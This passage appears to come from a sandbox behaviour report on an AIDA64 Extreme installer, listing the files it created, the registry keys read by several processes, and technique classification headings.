File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-DMMUS.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-TKVDT.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-0BDSD.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64help.url C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-SFCO1.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-U9KBU.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida_helper64.dll C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-KJV6M.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-SEMIB.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-J3A05.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.ini C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida_arc.dll C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-DNHR4.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\ssleay32.dll C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\storelibir-2.dll C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-5OO5O.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-VL1F3.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida_bench64.dll C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-MJIKG.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-EOIJC.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.url C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-EPEJP.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\CUESDK_2015.dll C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-1VQE0.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-GI6FB.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-AOQ0E.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida_icons2k.dll C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\storelibir.dll C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-6ESLM.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\INF\c_display.PNF C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC281.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\vccorlib140.dll_x86 C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC769.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF3A81FCB2D6CFEEF8.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml C:\Windows\System32\oobe\UserOOBEBroker.exe N/A
File created C:\Windows\SystemTemp\~DFA639CBA87617C157.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC768.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\concrt140.dll_x64 C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\msvcp140.dll_x64 C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\vcruntime140.dll_x86 C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\INF\c_media.PNF C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml C:\Windows\System32\oobe\UserOOBEBroker.exe N/A
File created C:\Windows\SystemTemp\~DF4E473C5A83EEF2CC.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF0FCCF5526EEA62A4.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log C:\Windows\System32\oobe\UserOOBEBroker.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\msvcp140.dll_x86 C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\INF\c_processor.PNF C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\vccorlib140.dll_x64 C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF989643022A5A3F31.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\msvcp140_1.dll_x86 C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF3D3545455E5026FD.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC6BB.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\vcruntime140.dll_x64 C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\INF\c_monitor.PNF C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
File created C:\Windows\SystemTemp\~DFD36974B6417142C7.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DFAFFD76C433B30C35.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC5B1.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF20299BB5AFFBD1BE.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF76911CEE38B4ABAC.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF5D9E4EA93CB066E3.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF0AB0F3D92FF57F74.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF878F8660D1F829DC.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setupact.log C:\Windows\System32\oobe\UserOOBEBroker.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF998870C7C2A68E2D.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\concrt140.dll_x86 C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\msvcp140_1.dll_x64 C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\CacheSize.txt C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF09A4447336A4E044.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\INF\c_volume.PNF C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
File created C:\Windows\INF\c_diskdrive.PNF C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
File opened for modification C:\Windows\Installer\MSIC3BB.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC487.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\CacheSize.txt C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Accessibility Features

persistence privilege_escalation

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\System32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\System32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\System32\netsh.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\LocationInformation C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Address C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Address C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LocationInformation C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Driver C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Driver C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName C:\Windows\explorer.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SYSTEM32\MsiExec.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
